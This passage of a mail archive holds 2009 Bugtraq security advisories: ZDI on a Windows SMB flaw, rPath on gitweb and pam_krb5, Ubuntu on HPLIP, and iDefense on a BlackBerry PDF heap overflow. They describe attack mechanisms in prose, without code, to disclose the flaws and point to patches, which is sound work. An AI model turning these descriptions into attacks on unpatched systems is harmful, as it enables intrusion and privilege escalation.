ciBmb3J3YXJkaW5nIHRvIDNDb20gYXQgcG9zdG1hc3RlckAzY29tLmNvbS4gDQo
From - Tue Jan 13 15:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058b0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39153-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 375DEEC180
for <lists@securityspace.com>; Tue, 13 Jan 2009 15:35:28 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id F31DF23719B; Tue, 13 Jan 2009 12:59:34 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9663 invoked from network); 13 Jan 2009 19:40:48 -0000
X-EDSINT-Source-Ip: 205.142.126.149
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-002: Microsoft SMB NT Trans2 Request Parsing Remote Code Execution
 Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OFEE76763C.83A19352-ON8525753D.006E0FF4-8625753D.006E3A7D@3com.com>
From: zdi-disclosures@3com.com
Date: Tue, 13 Jan 2009 14:04:00 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 01/13/2009 12:04:03 PM,
Serialize complete at 01/13/2009 12:04:03 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA5LTAwMjogTWljcm9zb2Z0IFNNQiBOVCBUcmFuczIgUmVxdWVzdCBQYXJzaW5nIFJlbW90
ZSBDb2RlIEV4ZWN1dGlvbiANClZ1bG5lcmFiaWxpdHkNCmh0dHA6Ly93d3cuemVyb2RheWluaXRp
YXRpdmUuY29tL2Fkdmlzb3JpZXMvWkRJLTA5LTAwMg0KSmFudWFyeSAxMywgMjAwOQ0KDQotLSBD
VkUgSUQ6DQpDVkUtMjAwOC00ODM1DQoNCi0tIEFmZmVjdGVkIFZlbmRvcnM6DQpNaWNyb3NvZnQN
Cg0KLS0gQWZmZWN0ZWQgUHJvZHVjdHM6DQpNaWNyb3NvZnQgV2luZG93cyBTZXJ2ZXIgMjAwOA0K
TWljcm9zb2Z0IFdpbmRvd3MgVmlzdGENCk1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDAzDQpN
aWNyb3NvZnQgV2luZG93cyBYUA0KTWljcm9zb2Z0IFdpbmRvd3MgMjAwMCBTUDQNCg0KLS0gVGlw
cGluZ1BvaW50KFRNKSBJUFMgQ3VzdG9tZXIgUHJvdGVjdGlvbjoNClRpcHBpbmdQb2ludCBJUFMg
Y3VzdG9tZXJzIGhhdmUgYmVlbiBwcm90ZWN0ZWQgYWdhaW5zdCB0aGlzDQp2dWxuZXJhYmlsaXR5
IGJ5IERpZ2l0YWwgVmFjY2luZSBwcm90ZWN0aW9uIGZpbHRlciBJRCA2NjYyLiANCkZvciBmdXJ0
aGVyIHByb2R1Y3QgaW5mb3JtYXRpb24gb24gdGhlIFRpcHBpbmdQb2ludCBJUFMsIHZpc2l0Og0K
DQogICAgaHR0cDovL3d3dy50aXBwaW5ncG9pbnQuY29tDQoNCi0tIFZ1bG5lcmFiaWxpdHkgRGV0
YWlsczoNClRoaXMgdnVsbmVyYWJpbGl0eSBhbGxvd3MgcmVtb3RlIGF0dGFja2VycyB0byB0cmln
Z2VyIGEgZGVuaWFsIG9mDQpzZXJ2aWNlIGNvbmRpdGlvbiBvbiB2dWxuZXJhYmxlIGluc3RhbGxh
dGlvbnMgb2YgTWljcm9zb2Z0IFdpbmRvd3M7DQpyZW1vdGUgY29kZSBleGVjdXRpb24gaXMgYWxz
byB0aGVvcmV0aWNhbGx5IHBvc3NpYmxlLiBVc2VyIGludGVyYWN0aW9uDQppcyBub3QgcmVxdWly
ZWQgdG8gZXhwbG9pdCB0aGlzIHZ1bG5lcmFiaWxpdHkuDQoNClRoZSBzcGVjaWZpYyBmbGF3IGV4
aXN0cyBpbiB0aGUgcHJvY2Vzc2luZyBvZiBTTUIgcmVxdWVzdHMuIEJ5DQpzcGVjaWZ5aW5nIG1h
bGZvcm1lZCB2YWx1ZXMgZHVyaW5nIGFuIE5UIFRyYW5zMiByZXF1ZXN0IGFuIGF0dGFja2VyIGNh
bg0KY2F1c2UgdGhlIHRhcmdldCBzeXN0ZW0gdG8ga2VybmVsIHBhbmljIHRoZXJlYnkgcmVxdWly
aW5nIGEgcmVib290IG9mDQp0aGUgc3lzdGVtLiBGdXJ0aGVyIG1hbmlwdWxhdGlvbiBjYW4gdGhl
b3JldGljYWxseSByZXN1bHQgaW4gcmVtb3RlDQp1bmF1dGhlbnRpY2F0ZWQgY29kZSBleGVjdXRp
b24uDQoNCi0tIFZlbmRvciBSZXNwb25zZToNCk1pY3Jvc29mdCBoYXMgaXNzdWVkIGFuIHVwZGF0
ZSB0byBjb3JyZWN0IHRoaXMgdnVsbmVyYWJpbGl0eS4gTW9yZQ0KZGV0YWlscyBjYW4gYmUgZm91
bmQgYXQ6DQoNCmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS90ZWNobmV0L3NlY3VyaXR5L2J1bGxl
dGluL21zMDktMDAxLm1zcHgNCg0KLS0gRGlzY2xvc3VyZSBUaW1lbGluZToNCjIwMDgtMDgtMTQg
LSBWdWxuZXJhYmlsaXR5IHJlcG9ydGVkIHRvIHZlbmRvcg0KMjAwOS0wMS0xMyAtIENvb3JkaW5h
dGVkIHB1YmxpYyByZWxlYXNlIG9mIGFkdmlzb3J5DQoNCi0tIENyZWRpdDoNClRoaXMgdnVsbmVy
YWJpbGl0eSB3YXMgZGlzY292ZXJlZCBieToNCiAgICAqIEFub255bW91cw0KDQotLSBBYm91dCB0
aGUgWmVybyBEYXkgSW5pdGlhdGl2ZSAoWkRJKToNCkVzdGFibGlzaGVkIGJ5IFRpcHBpbmdQb2lu
dCwgVGhlIFplcm8gRGF5IEluaXRpYXRpdmUgKFpESSkgcmVwcmVzZW50cyANCmEgYmVzdC1vZi1i
cmVlZCBtb2RlbCBmb3IgcmV3YXJkaW5nIHNlY3VyaXR5IHJlc2VhcmNoZXJzIGZvciByZXNwb25z
aWJseQ0KZGlzY2xvc2luZyBkaXNjb3ZlcmVkIHZ1bG5lcmFiaWxpdGllcy4NCg0KUmVzZWFyY2hl
cnMgaW50ZXJlc3RlZCBpbiBnZXR0aW5nIHBhaWQgZm9yIHRoZWlyIHNlY3VyaXR5IHJlc2VhcmNo
DQp0aHJvdWdoIHRoZSBaREkgY2FuIGZpbmQgbW9yZSBpbmZvcm1hdGlvbiBhbmQgc2lnbi11cCBh
dDoNCg0KICAgIGh0dHA6Ly93d3cuemVyb2RheWluaXRpYXRpdmUuY29tDQoNClRoZSBaREkgaXMg
dW5pcXVlIGluIGhvdyB0aGUgYWNxdWlyZWQgdnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBpcw0K
dXNlZC4gVGlwcGluZ1BvaW50IGRvZXMgbm90IHJlLXNlbGwgdGhlIHZ1bG5lcmFiaWxpdHkgZGV0
YWlscyBvciBhbnkNCmV4cGxvaXQgY29kZS4gSW5zdGVhZCwgdXBvbiBub3RpZnlpbmcgdGhlIGFm
ZmVjdGVkIHByb2R1Y3QgdmVuZG9yLA0KVGlwcGluZ1BvaW50IHByb3ZpZGVzIGl0cyBjdXN0b21l
cnMgd2l0aCB6ZXJvIGRheSBwcm90ZWN0aW9uIHRocm91Z2gNCml0cyBpbnRydXNpb24gcHJldmVu
dGlvbiB0ZWNobm9sb2d5LiBFeHBsaWNpdCBkZXRhaWxzIHJlZ2FyZGluZyB0aGUNCnNwZWNpZmlj
cyBvZiB0aGUgdnVsbmVyYWJpbGl0eSBhcmUgbm90IGV4cG9zZWQgdG8gYW55IHBhcnRpZXMgdW50
aWwNCmFuIG9mZmljaWFsIHZlbmRvciBwYXRjaCBpcyBwdWJsaWNseSBhdmFpbGFibGUuIEZ1cnRo
ZXJtb3JlLCB3aXRoIHRoZQ0KYWx0cnVpc3RpYyBhaW0gb2YgaGVscGluZyB0byBzZWN1cmUgYSBi
cm9hZGVyIHVzZXIgYmFzZSwgVGlwcGluZ1BvaW50DQpwcm92aWRlcyB0aGlzIHZ1bG5lcmFiaWxp
dHkgaW5mb3JtYXRpb24gY29uZmlkZW50aWFsbHkgdG8gc2VjdXJpdHkNCnZlbmRvcnMgKGluY2x1
ZGluZyBjb21wZXRpdG9ycykgd2hvIGhhdmUgYSB2dWxuZXJhYmlsaXR5IHByb3RlY3Rpb24gb3IN
Cm1pdGlnYXRpb24gcHJvZHVjdC4NCg0KT3VyIHZ1bG5lcmFiaWxpdHkgZGlzY2xvc3VyZSBwb2xp
Y3kgaXMgYXZhaWxhYmxlIG9ubGluZSBhdDoNCg0KICAgIGh0dHA6Ly93d3cuemVyb2RheWluaXRp
YXRpdmUuY29tL2Fkdmlzb3JpZXMvZGlzY2xvc3VyZV9wb2xpY3kvDQoNCkNPTkZJREVOVElBTElU
WSBOT1RJQ0U6IFRoaXMgZS1tYWlsIG1lc3NhZ2UsIGluY2x1ZGluZyBhbnkgYXR0YWNobWVudHMs
DQppcyBiZWluZyBzZW50IGJ5IDNDb20gZm9yIHRoZSBzb2xlIHVzZSBvZiB0aGUgaW50ZW5kZWQg
cmVjaXBpZW50KHMpIGFuZA0KbWF5IGNvbnRhaW4gY29uZmlkZW50aWFsLCBwcm9wcmlldGFyeSBh
bmQvb3IgcHJpdmlsZWdlZCBpbmZvcm1hdGlvbi4NCkFueSB1bmF1dGhvcml6ZWQgcmV2aWV3LCB1
c2UsIGRpc2Nsb3N1cmUgYW5kL29yIGRpc3RyaWJ1dGlvbiBieSBhbnkgDQpyZWNpcGllbnQgaXMg
cHJvaGliaXRlZC4gIElmIHlvdSBhcmUgbm90IHRoZSBpbnRlbmRlZCByZWNpcGllbnQsIHBsZWFz
ZQ0KZGVsZXRlIGFuZC9vciBkZXN0cm95IGFsbCBjb3BpZXMgb2YgdGhpcyBtZXNzYWdlIHJlZ2Fy
ZGxlc3Mgb2YgZm9ybSBhbmQNCmFueSBpbmNsdWRlZCBhdHRhY2htZW50cyBhbmQgbm90aWZ5IDND
b20gaW1tZWRpYXRlbHkgYnkgY29udGFjdGluZyB0aGUNCnNlbmRlciB2aWEgcmVwbHkgZS1tYWls
IG9yIGZvcndhcmRpbmcgdG8gM0NvbSBhdCBwb3N0bWFzdGVyQDNjb20uY29tLiANCg=
From - Tue Jan 13 16:12:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058b1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39148-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 3C124EC186
for <lists@securityspace.com>; Tue, 13 Jan 2009 16:04:06 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1825D14380F; Tue, 13 Jan 2009 12:24:27 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7432 invoked from network); 13 Jan 2009 18:27:42 -0000
X-Authentication-Warning: logo.rdu.rpath.com: elliot set sender to rPath Update Announcements <announce-noreply@rpath.com> using -r
Date: Tue, 13 Jan 2009 13:44:47 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: security-announce@lists.rpath.com,
update-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2009-0005-1 git gitweb
Message-ID: <496ce11f.tdN1NmCfTiE6P8DX%announce-noreply@rpath.com>
User-Agent: nail 11.22 3/20/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   

rPath Security Advisory: 2009-0005-1
Published: 2009-01-13
Products:
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Remote System User Deterministic Unauthorized Access
Updated Versions:
    git=conary.rpath.com@rpl:2/1.5.6.6-0.1-1
    gitweb=conary.rpath.com@rpl:2/1.5.6.6-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2936

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5517
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5516

Description:
    In previous versions of the git package, insufficient quoting of
    shell characters allowed remote attackers to execute arbitrary
    commands via the git web interface.  This has been resolved.

http://wiki.rpath.com/Advisories:rPSA-2009-0005

Copyright 2009 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From - Tue Jan 13 16:22:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058b2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39149-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id D65BDEC128
for <lists@securityspace.com>; Tue, 13 Jan 2009 16:16:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 6AA85143792; Tue, 13 Jan 2009 12:33:32 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7468 invoked from network); 13 Jan 2009 18:29:22 -0000
X-Authentication-Warning: logo.rdu.rpath.com: elliot set sender to rPath Update Announcements <announce-noreply@rpath.com> using -r
Date: Tue, 13 Jan 2009 13:46:43 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: security-announce@lists.rpath.com,
update-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2009-0007-1 pam_krb5
Message-ID: <496ce193.docOvfWnQX+ygHWi%announce-noreply@rpath.com>
User-Agent: nail 11.22 3/20/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   

rPath Security Advisory: 2009-0007-1
Published: 2009-01-13
Products:
    rPath Linux 2

Rating: Severe
Exposure Level Classification:
    Local Root Deterministic Privilege Escalation
Updated Versions:
    pam_krb5=conary.rpath.com@rpl:2/2.2.11-4.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2929

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=cvename.cgi?name=CVE-2008-3825

Description:
    When the existing_ticket option is enabled, previous versions of the
    pam_krb5 package use incorrect privileges when reading a Kerberos
    credential cache, which allows other local users to gain privileges
    by setting the KRB5CCNAME environment variable to an arbitrary cache
    filename and running the su or sudo program.  It may be possible to
    mount a similar attack using sshd if sshd is configured insecurely,
    but such a configuration will be otherwise vulnerable and so this
    is not considered relevant.
    
    rPath Linux does not ship with the existing_ticket option enabled
    by default, and therefore is by default not vulnerable to this attack.

http://wiki.rpath.com/Advisories:rPSA-2009-0007

Copyright 2009 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From - Tue Jan 13 17:02:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058b3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39154-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8B7F8EC118
for <lists@securityspace.com>; Tue, 13 Jan 2009 17:00:50 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id BAE47236FCB; Tue, 13 Jan 2009 14:44:09 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12714 invoked from network); 13 Jan 2009 20:26:54 -0000
Subject: [USN-708-1] HPLIP vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -4.2
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.74.0.165
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-CXh9fLe/CpQXpMIMbKne"
Date: Tue, 13 Jan 2009 15:50:26 -0500
Message-Id: <1231879826.11166.22.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.2 
Status:   


--=-CXh9fLe/CpQXpMIMbKne
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-708-1           January 13, 2009
hplip vulnerability
https://launchpad.net/bugs/191299
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  hplip                           2.7.7.dfsg.1-0ubuntu5.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that an installation script in the HPLIP package would
change permissions on the hplip config files located in user's home directories.
A local user could exploit this and change permissions on arbitrary files
upon an HPLIP installation or upgrade, which could lead to root privileges.


Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3.diff.gz
      Size/MD5:   149462 e8b5cb18aff082738bfcfe069eb873f5
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3.dsc
      Size/MD5:     1064 531e707f0cbace5f1eb82039e409c306
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1.orig.tar.gz
      Size/MD5: 14361049 ae5165d46413db8119979f5b3345f7a5

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-data_2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:  6898006 691895b0f8e5fc93bcb86d47d11da1af
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-doc_2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:  4146918 d4e0b928aacc84bbe2a05862050a5963
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-gui_2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:   117628 91f0c9d09f2520e76b3a3e6cde4abd63
    http://security.ubuntu.com/ubuntu/pool/universe/h/hplip/hpijs-ppds_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:   480134 59604754cef89d7b5ae128ecf20f44da

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_amd64.deb
      Size/MD5:   341576 918813fb4741326051c7480ffeae9a9a
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_amd64.deb
      Size/MD5:   770122 ccef78fc8a55b4e94318931964e9e97b
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_amd64.deb
      Size/MD5:   302856 f2a47e27a69aa016334a1ffdac105be1

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_i386.deb
      Size/MD5:   334690 dd891b2df494fd1fbc46abd25b9ef7db
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_i386.deb
      Size/MD5:   747250 4676694a4d20445e64f3f4dc91aaa44c
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_i386.deb
      Size/MD5:   290282 921463222e2b642fb5bc16083d8b70ac

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_lpia.deb
      Size/MD5:   337798 9c060add246bb5212706b9dd0d92cc51
    http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_lpia.deb
      Size/MD5:   926096 af4481ea010212486ea621103329cf13
    http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_lpia.deb
      Size/MD5:   290082 f26b9fc31e3457719b3102b3a9c77b5b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb
      Size/MD5:   348258 66f9714865cad898e10e98ef83f6e443
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb
      Size/MD5:   784504 0c76dac215474fc62900aea547168387
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb
      Size/MD5:   319006 52d13211d1681fe90b74951dc204a788

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_sparc.deb
      Size/MD5:   332756 a3411ca114399f0359b949462e0313ab
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_sparc.deb
      Size/MD5:   717210 401d1050417a9a8608198088abb9e305
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_sparc.deb
      Size/MD5:   289370 f92c0c0f6a2f2ccef18d3874db728bf7



--=-CXh9fLe/CpQXpMIMbKne
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkls/o8ACgkQLMAs/0C4zNrcLgCghOdVf4DIVYQ/G4ERIDP2qJ2P
wKcAn05AE2q/x4yoir1sbwux1JtUtBmU
=8Pw+
-----END PGP SIGNATURE-----

--=-CXh9fLe/CpQXpMIMbKne--

From - Tue Jan 13 17:12:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058b4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39155-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 1ABCDEC131
for <lists@securityspace.com>; Tue, 13 Jan 2009 17:10:52 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 16C86237198; Tue, 13 Jan 2009 14:45:01 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 13167 invoked from network); 13 Jan 2009 20:39:13 -0000
Message-ID: <496D00F3.5020603@idefense.com>
Date: Tue, 13 Jan 2009 16:00:35 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller 'bitmaps' Heap Overflow Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Research In
Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an
attacker to execute arbitrary code with the privileges of the affected
service, usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF
file. During parsing, a dynamic array is filled up with pointers to
certain objects without properly checking to see whether the array is
large enough to hold all of the pointers. By inserting a large number
of pointers, it is possible to overflow the array, and corrupt object
pointers. This can lead to the EIP register being controlled, which
results in the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must e-mail an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

In Labs testing, it was possible to gain code execution, albeit
unreliably. It is likely that with additional heap sculpting reliable
code execution is possible.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration
tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
